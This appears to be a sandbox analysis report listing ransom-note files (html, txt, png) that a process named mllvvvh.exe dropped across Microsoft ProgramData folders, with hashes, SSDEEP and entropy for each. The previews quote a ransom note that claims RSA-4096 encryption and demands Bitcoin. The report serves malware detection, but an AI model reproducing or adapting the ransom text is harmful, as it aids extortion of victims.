                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Settings\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Settings\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\SmsRouter\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\SmsRouter\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\SmsRouter\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Spectrum\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Spectrum\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Spectrum\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Speech_OneCore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Speech_OneCore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Speech_OneCore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Storage Health\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Storage Health\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Storage Health\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\UEV\InboxTemplates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\UEV\InboxTemplates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\UEV\InboxTemplates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\UEV\Scripts\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
